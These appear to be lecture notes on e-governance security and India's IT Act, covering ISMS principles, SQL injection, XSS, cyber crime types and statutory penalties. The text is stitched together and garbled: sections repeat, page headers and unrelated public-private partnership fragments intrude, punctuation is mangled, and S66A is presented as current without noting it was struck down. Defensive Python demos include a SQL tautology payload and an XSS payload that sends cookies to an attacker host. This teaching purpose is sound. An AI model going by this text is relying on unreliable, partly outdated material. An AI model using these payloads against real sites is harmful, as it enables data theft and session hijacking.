The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of this service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

• understanding an organization's information security requirements and the need to establish policy and objectives for information security;
• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
• monitoring and reviewing the performance and effectiveness of the ISMS; and
• continual improvement based on objective measurement.

Data security requires a set of security requirements:

• Authentication: capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.
• Authorization: capability to give rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.
• Confidentiality: capability to prevent unauthorized access to information.
• Integrity: capability to prevent information from unauthorized modification and to ensure that information can be relied upon and is accurate and complete.
• Traceability: capability to chronologically interrelate any transaction to a person or system that performed the action, in a way that is verifiable.
• Non-repudiation: capability to prevent the intervening person or system in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing:

• Protecting premises, equipment and systems software, including input-output units.
• Protecting software applications used to process personal data.
• Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.
• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.
• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks use techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis.
• Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness.
• Continually improve its control environment.
• Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
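The two vulnerability classes named above, each shown beside its fix, as an added Python example that is not part of the original notes; the in-memory citizens table, its two records and the test inputs are all constructed for the demonstration.

```python
"""Vulnerable vs hardened handling of untrusted input in a web portal.

Constructed demonstration: an in-memory SQLite table of citizen records
stands in for a portal database; every input used below is constructed.
"""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two citizen records in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE citizens (username TEXT PRIMARY KEY, tax_id TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO citizens VALUES (?, ?, ?)",
        [("asha", "TAX-0001", "hash-a"), ("ravi", "TAX-0002", "hash-b")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """SQL injection: the username is spliced into the statement text, so a
    quote character in it changes the structure of the query itself."""
    sql = "SELECT username, tax_id FROM citizens WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, username):
    """Parameterized query: the driver binds the value as data, so it is never
    parsed as SQL whatever characters it contains."""
    sql = "SELECT username, tax_id FROM citizens WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def vulnerable_query_fails(conn, username):
    """True when the concatenated query is not even valid SQL for this input,
    which is how honest users with an apostrophe in their name get errors."""
    try:
        lookup_vulnerable(conn, username)
        return False
    except sqlite3.OperationalError:
        return True


def render_vulnerable(display_name):
    """Reflected XSS: untrusted text is placed into HTML unchanged, so any
    markup in it is interpreted by the visitor's browser."""
    return "<p>Welcome, " + display_name + "</p>"


def render_hardened(display_name):
    """Output encoding: <, >, &, and quotes become entities, so the browser
    displays the text literally instead of treating it as markup."""
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "</p>"


def demo():
    """Run both versions over constructed inputs and return the results."""
    conn = make_db()
    tautology = "' OR '1'='1"                      # constructed hostile username
    markup = '<script>alert("xss")</script>'      # constructed hostile display name
    return {
        "vulnerable_rows": lookup_vulnerable(conn, tautology),   # leaks every row
        "hardened_rows": lookup_hardened(conn, tautology),       # no such user: []
        "vulnerable_html": render_vulnerable(markup),            # script tag intact
        "hardened_html": render_hardened(markup),                # entities only
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```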

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction, and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms and Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft

schemes from individuals

A rapidly growing online user base

121 Million Internet Users

65 Million Active Internet Users up by 28 from 51 million in 2010

50 Million users shop online on Ecommerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages

PREPARED BY ARUN PRATAP SINGH 56

56

CYBER LAW

(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or

Damage to the public or any person Destroys or Deletes or Alters any Information

Residing in a Computer Resource or diminishes its value or utility or affects it injuriously

by any means commits hack

(2) Whoever commits hacking shall be punished with imprisonment up to three years or with

fine which may extend up to two lakh rupees or with both

Whoever without permission of the owner of the computer

Secures Access

Downloads Copies or extracts any data computer database or any

information

Introduce or causes to be introduce any Virus or Contaminant

Disrupts or causes disruption

Denies or causes denial of access to any person

Provides any assistance to any person to facilitate access

Charges the services availed of by a person to the account of

another person by Tampering with or Manipulating any Computer

Computer System or Computer Network

Shall be liable to pay damages by way of compensation not exceeding one crore rupees

to the person so affected

Section ndash 43

Destroys Deletes or Alters any Information residing in a computer resource or diminishes its

value or utility or affects it injuriously by any means

Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any

computer source code used for a computer resource with an intention to cause damage

ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be

punishable with imprisonment for a term which may extend to two three years or with fine which

may extend to five lakh rupees or with bothrdquo [S66]

S66A - Punishment for sending offensive messages through communication service etc

Any person who sends by means of a computer resource or a communication device

Any information that is grossly offensive or has menacing character or

PREPARED BY ARUN PRATAP SINGH 57

57

Any information which he knows to be false but for the purpose of causing annoyance

inconvenience danger obstruction insult injury criminal intimidation enmity hatred or

ill will persistently makes by making use of such computer resource or a communication

device

Any electronic mail or electronic mail message for the purpose of causing annoyance or

inconvenience or to deceive or to mislead the addressee or recipient about the origin of

such messages

Shall be punishable with imprisonment for a term which may extend to three years and with

fine

S 66C - Punishment for identity theft

ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or

any other unique identification feature of any other person shall be punished with imprisonment

of either description for a term which may extend to three years and shall also be liable to fine

which may extend to rupees one lakhrdquo

S 66D - Punishment for cheating by personation by using computer resource

ldquoWhoever by means of any communication device or computer resource cheats by

personation shall be punished with imprisonment of either description for a term which may

extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo

S 66E - Punishment for violation of privacy

ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private

area of any person without his or her consent under circumstances violating the privacy of that

person shall be punished with imprisonment which may extend to three years or with fine not

exceeding two lakh rupees or with bothrdquo

S 67 A - Punishment for publishing or transmitting of material containing sexually

explicit act etc in electronic form

ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form

any material which contains sexually explicit act or conduct shall be punished on first conviction

with imprisonment of either description for a term which may extend to five years and with fine

which may extend to ten lakh rupeesrdquo

S 67 C - Preservation and Retention of information by intermediaries

ldquo(1) Intermediary shall preserve and retain such information as may be specified for such

duration and in such manner and format as the Central Government may prescribe

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section

(1) shall be punished with an imprisonment for a term which may extend to three years and shall

also be liable to finerdquo

PREPARED BY ARUN PRATAP SINGH 58

58

IT ACT

The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of

the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed

by Save Your Voice campaign and other civil society organizations in India User-review and

consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of

India to repeal and nullify parts of IT Act 2000

The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997

has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission

on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce

Following the UN Resolution India passed the Information Technology Act 2000 in May 2000

which came into force on October 17 2000 The Information Technology Act 2000 has been

substantially amended through the Information Technology (Amendment) Act 2008 which was

passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the

Presidential assent on February 5 2009 and came into force on October 27 2009 The amended

Act has provided additional focus on information security It has added several new sections on

offences including cyber terrorism and data protection A set of Rules related to sensitive personal

information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was

notified in April 2011

Provisions ndash

Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four

schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding

5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II

have been replaced Schedules III and IV are deleted

Information Technology Act 2000 addressed the following issues

1 Legal recognition of electronic documents

2 Legal Recognition of digital signatures

3 Offenses and contraventions

4 Justice dispensation systems for cybercrimes

Offences ndash

Section Offence Punishment

65 Tampering with computer source documents - Intentional

concealment destruction or alteration of source code when the

Imprisonment up to

three years orand

PREPARED BY ARUN PRATAP SINGH 59

59

computer source code is required to be kept or maintained by

law for the time being in force

with fine up to 2 lakh

rupees

66 Hacking

Imprisonment up to

three years orand

with fine up to 5 lakh

rupees

66-A

Sending offensive message through electronic means -

Sending any information through an electronic message that is

grossly offensive or has menacing character and might cause

insult injury criminal intimidation enmity hatred or ill will etc

or sending such mail intended to deceive or to mislead the

addressee or recipient about the origin of such messages

Imprisonment up to

three years and with

fine

Criticisms-

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December

2008 with no discussion in the House Some of the cyber law observers have criticized the

amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil

liberties of Indians There have also been appreciation about the amendments from many

observers because it addresses the issue of Cyber Security

Section 69 empowers the Central GovernmentState Government its authorized agency to

intercept monitor or decrypt any information generated transmitted received or stored in any

computer resource if it is necessary or expedient so to do in the interest of the sovereignty or

integrity of India defence of India security of the State friendly relations with foreign States or

public order or for preventing incitement to the commission of any cognizable offence or for

investigation of any offence They can also secure assistance from computer personnel in

decrypting data (see mandatory decryption) under penalty of imprisonment

Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A

has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional

validity Based on Section 66A Bombay High Court has held that creating a website and storing

false information on it can entail cyber crime

Page 48: Web technology and commerce unit 4

PREPARED BY ARUN PRATAP SINGH 47

47

bull Make the Good or Service Available

bull Pay for Performance and Output

bull Introduce Competition ndash For and In the Market

PREPARED BY ARUN PRATAP SINGH 48

48

The Need to Set the Right Priorities ndash

Four Basic Dimensions of P3

Although each is unique all P3rsquos include four basic characteristics

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

PREPARED BY ARUN PRATAP SINGH 49

49

Crafting the Partnership

Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

Whatrsquos the need

Whatrsquos driving the need rationale

Facility non-compliance natural disaster budget deficit

Is there a need for a PublicPrivate Partnership

PREPARED BY ARUN PRATAP SINGH 50

50

Preliminary Project Definition

Feasibility

Is a PublicPrivate Partnership feasible not only financially but practically Can it be

done

Market Research

EconomicFinancial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project

Has the plan been thoroughly tested to assess market demand public and stakeholder

feedback and economics

Master ScheduleBudget

Political Climate

Any potential ldquofatal flawsrdquo that could derail the project

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What's the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source / RFP / Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract / Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have many transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all share broadly similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites, one that is informative and another that is a gateway for e-government services, and citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of those services.

2 INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach of an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization's information security requirements and the need to establish a policy and objectives for information security;

implementing and operating controls to manage the organization's information security risks in the context of its overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS, and continually improving it based on objective measurement.

Data security rests on a set of security requirements:

Authentication - the capability to identify who is using the service (a person or a software program); the process of verifying that you are who you say you are.

Authorization - the capability to grant rights of access to resources; the process of verifying that someone has the right to do what she is trying to do.

Confidentiality - the capability to prevent unauthorized access to information.

Integrity - the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.

Traceability - the capability to chronologically relate any transaction to the person or system that performed it, in a way that is verifiable.

Non-repudiation - the capability to prevent a person or system that took part in an event or action from later denying or disputing that participation.
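Traceability and integrity as defined above are only useful if the record of who did what can itself be checked. The following is an added example, not code from the original notes: an append-only audit trail in which every entry names the actor and is bound to its predecessor with an HMAC, so that editing, deleting or reordering any entry is detectable. The key, the actor names, the resource identifiers and the events are constructed for the demonstration.

```python
"""Tamper-evident audit trail for e-Government transactions (added example).

Each entry records who did what to which record and when. Its tag is an
HMAC-SHA256 over the previous entry's tag plus the entry body, so a later
edit, deletion or reordering anywhere in the log breaks the chain.
"""
import hashlib
import hmac
import json

# Assumption: in a real deployment this key is held by the audit service
# (HSM/KMS), not by the application that generates the events.
AUDIT_KEY = b"demo-audit-key-not-for-production"
GENESIS_TAG = "0" * 64  # tag assumed for the (non-existent) entry before the first


def _tag(prev_tag: str, entry: dict) -> str:
    """HMAC over the previous tag and the canonical JSON form of the entry body."""
    payload = prev_tag.encode() + json.dumps(entry, sort_keys=True).encode()
    return hmac.new(AUDIT_KEY, payload, hashlib.sha256).hexdigest()


def append(log: list, actor: str, action: str, resource: str, ts: int) -> dict:
    """Append one event; the sequence number and previous tag bind it into the chain."""
    prev_tag = log[-1]["tag"] if log else GENESIS_TAG
    entry = {"seq": len(log), "ts": ts, "actor": actor,
             "action": action, "resource": resource}
    entry["tag"] = _tag(prev_tag, entry)  # entry has no "tag" key yet: body only
    log.append(entry)
    return entry


def verify(log: list) -> int:
    """Return -1 if every entry chains correctly, else the index of the first bad one."""
    prev_tag = GENESIS_TAG
    for i, entry in enumerate(log):
        body = {k: v for k, v in entry.items() if k != "tag"}
        expected = _tag(prev_tag, body)
        if entry.get("seq") != i or not hmac.compare_digest(expected, entry.get("tag", "")):
            return i
        prev_tag = entry["tag"]
    return -1


def who_touched(log: list, resource: str) -> list:
    """Traceability: chronological (ts, actor, action) tuples for one record."""
    return [(e["ts"], e["actor"], e["action"]) for e in log if e["resource"] == resource]


def build_sample_log() -> list:
    """Constructed sample events from two hypothetical officials."""
    log = []
    append(log, "clerk42", "READ", "citizen/1001", 1700000000)
    append(log, "clerk42", "UPDATE", "citizen/1001", 1700000060)
    append(log, "officer7", "READ", "citizen/2002", 1700000120)
    return log


if __name__ == "__main__":
    log = build_sample_log()
    print("intact:", verify(log))                      # -1
    print("history:", who_touched(log, "citizen/1001"))
    tampered = [dict(e) for e in log]
    tampered[1]["actor"] = "nobody"                    # blame someone else
    print("edited entry:", verify(tampered))           # 1
    truncated = [dict(e) for e in log]
    del truncated[1]                                   # hide the UPDATE
    print("deleted entry:", verify(truncated))         # 1
```

A shared-key HMAC gives integrity and traceability to whoever holds the key, but not non-repudiation in the sense listed above: the audit service itself could rewrite and re-tag the whole chain. For non-repudiation each actor must sign their own entries with a private key, which is what the legal recognition of digital signatures later in these notes is about.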

Examples of organizational and technical measures to prevent unauthorized access and processing:

Protecting premises, equipment and systems software, including input-output units

Protecting software applications used to process personal data

Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Even so, trusted security and privacy measures are a crucial success factor for e-Government that has not yet been adequately addressed: the UN 2012 Survey shows that only 20% of national portals clearly indicate the presence of security features. Europe leads, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public-organization web portals.

3 INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Documented attacks use techniques such as packet sniffing, probing, malware, attacks on the Internet infrastructure, denial of service, remote-to-local and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;

maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;

continually improve its control environment;

effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, yet e-Government websites are still exposed to them. One research study found 816 e-Government websites from 212 different countries vulnerable to Cross-Site Scripting (XSS) and Structured Query Language (SQL) injection. SQL injection lets an attacker alter the queries an application sends to its database, compromising the confidentiality and integrity of the stored data; XSS lets an attacker run script in other users' browsers in the context of the government site, which can be used to steal session cookies, credentials and other user information.
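The two vulnerability classes named above, shown side by side with their fixes. This is an added example, not code from the original notes or from the study they cite; it uses an in-memory SQLite table with constructed rows, and the table name, columns and the attack inputs are assumptions made for the demonstration.

```python
"""SQL injection and reflected XSS in a citizen-lookup page, vulnerable and
hardened variants side by side (added example with constructed data)."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table standing in for a government records database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO citizens (name, role) VALUES (?, ?)",
        [("Asha", "citizen"), ("Ravi", "citizen"), ("Admin", "officer")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Builds the query by string formatting: the input becomes SQL syntax."""
    sql = f"SELECT name, role FROM citizens WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, name: str) -> list:
    """Parameterised query: the driver passes `name` as data, never as SQL."""
    return conn.execute(
        "SELECT name, role FROM citizens WHERE name = ?", (name,)
    ).fetchall()


def render_vulnerable(name: str) -> str:
    """Reflects the search term into HTML unescaped: reflected XSS."""
    return f"<p>No record found for {name}</p>"


def render_hardened(name: str) -> str:
    """Escapes the term so it can only ever be text inside the <p>."""
    return f"<p>No record found for {html.escape(name, quote=True)}</p>"


# Constructed attack inputs; the attacker host is hypothetical.
SQLI_PAYLOAD = "x' OR '1'='1"
XSS_PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    conn = make_db()
    # The tautology turns "find one citizen" into "dump every row", officer included.
    print(lookup_vulnerable(conn, SQLI_PAYLOAD))
    print(lookup_hardened(conn, SQLI_PAYLOAD))   # []
    print(render_vulnerable(XSS_PAYLOAD))        # script would run in the victim's browser
    print(render_hardened(XSS_PAYLOAD))          # rendered as inert text
```

Parameterisation fixes the injection whatever the input contains; sqlite3 also refuses stacked statements, but many other drivers do not, so a `'; DROP TABLE` style payload is the other thing the hardened form prevents. `html.escape` covers the HTML-body context shown here only; attributes, URLs and script blocks need their own encoders, and a Content-Security-Policy plus HttpOnly session cookies limit what a successful XSS can exfiltrate.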

Specific security measures such as firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality or social order, or any unjust or shameful act. 'Offence' is defined in the Code of Criminal Procedure as an act or omission made punishable by any law for the time being in force.

Cyber crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber crime is a term used broadly to describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity; it includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, information warfare and related activities.

Pornography, threatening e-mail, assuming someone's identity, sexual harassment, defamation, spam and phishing are examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. A 37 per cent year-on-year increase in hacking was reported.

Cyber Squatting

Cyber squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act, 2000.

Phishing

Phishing is just one of the many frauds on the Internet that try to fool people into parting with their money. Phishing refers to the receipt, by customers of financial institutions, of unsolicited e-mails requesting them to enter their username, password or other personal information in order to access their account for some stated reason. The fraudster then has access to the customer's online bank account and to the funds in it.

Cyber Stalking

Cyber stalking is the use of the Internet or other electronic means to stalk someone. The term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. It is typically used to steal credit card numbers or other information used in identity theft schemes.

A rapidly growing online user base

121 million Internet users

65 million active Internet users, up 28% from 51 million in 2010

50 million users shop online on e-commerce and online shopping sites

46+ million social network users

346 million mobile users had subscribed to data packages


CYBER LAW

Section 66 (as originally enacted in the Information Technology Act, 2000) - Hacking with computer system

(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43 - Penalty and compensation for damage to computer, computer system, etc.

Whoever without permission of the owner of the computer:

secures access;

downloads, copies or extracts any data, computer database or any information;

introduces or causes to be introduced any virus or contaminant;

disrupts or causes disruption;

denies or causes denial of access to any person;

provides any assistance to any person to facilitate access;

charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

destroys, deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means;

steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected. (The last two items were added by the 2008 amendment, which also removed the one crore rupee ceiling on compensation.)

Section 66 (as substituted by the 2008 amendment) - Computer related offences

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S 66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

(a) any information that is grossly offensive or has menacing character; or

(b) any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently by making use of such computer resource or a communication device; or

(c) any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

